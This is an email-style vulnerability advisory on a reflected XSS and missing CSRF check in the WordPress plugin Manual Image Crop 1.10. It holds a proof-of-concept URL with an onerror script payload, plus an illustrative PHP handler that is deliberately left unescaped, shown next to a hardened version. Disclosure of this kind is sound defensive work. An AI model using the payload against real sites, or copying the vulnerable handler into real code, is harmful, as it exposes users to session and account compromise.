Subject: Cross-Site Scripting (XSS) in Manual Image Crop 1.10
Date: Mon, 24 Aug 2015 13:54:27 +0200

Hello,

Plugin: Manual Image Crop 1.10 https://wordpress.org/plugins/manual-image-crop/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (including subscribers) can inject HTML/JS code; the AJAX action also has no CSRF protection.

Method: GET
URL: http://localhost/wp-admin/admin-ajax.php?action=mic_editor_window&postId=[xss]
Vulnerable parameters: postId

Example PHP call stack:
mic_ajax_editor_window   [/manual-image-crop/manual-image-crop.php:50]
ManualImageCropEditorWindow::renderWindow   [/manual-image-crop/lib/ManualImageCropEditorWindow.php:77]

Verification:
http://localhost/wp-admin/admin-ajax.php?action=mic_editor_window&postId=%22%3E%3Cimg%20src=x%20onerror=alert(1)%20/%3E
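
To show the pattern being reported next to a hardened form, here is an added example, not the plugin's own code: the handler bodies, the `mic_post_id` element id and the nonce name are assumptions; only the action name, the `postId` parameter and the WordPress functions are real.

```php
<?php
// Added illustration, not code from Manual Image Crop. Only the action name,
// the postId parameter and the WordPress API calls are real; the rest is assumed.

// Vulnerable pattern as described in the advisory: the raw GET parameter is
// written into an HTML attribute unescaped, and nothing ties the request to a
// nonce or a capability check.
function mic_editor_window_vulnerable() {
    $postId = $_GET['postId'];   // attacker-controlled string
    echo '<input type="hidden" id="mic_post_id" value="' . $postId . '" />';
    wp_die();
}

// Hardened version:
//  1. check_ajax_referer() rejects requests that lack a valid nonce (CSRF).
//  2. absint() forces the ID to a non-negative integer, so no markup survives.
//  3. current_user_can() limits the action to users allowed to edit that post.
//  4. esc_attr() escapes at the output point regardless of the value's origin.
function mic_editor_window_hardened() {
    // The calling JS must send a nonce made with wp_create_nonce( 'mic_editor_window' )
    // in the 'nonce' request field (nonce action/field names are hypothetical).
    check_ajax_referer( 'mic_editor_window', 'nonce' );

    $postId = isset( $_GET['postId'] ) ? absint( $_GET['postId'] ) : 0;
    if ( 0 === $postId || ! current_user_can( 'edit_post', $postId ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    echo '<input type="hidden" id="mic_post_id" value="' . esc_attr( $postId ) . '" />';
    wp_die();
}

add_action( 'wp_ajax_mic_editor_window', 'mic_editor_window_hardened' );
```

With the hardened handler, the verification URL above yields a 403 (missing nonce), and even a request with a valid nonce reduces `%22%3E%3Cimg...` to the integer 0 before it reaches the output.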

-- 
Regards,
Marcin Probola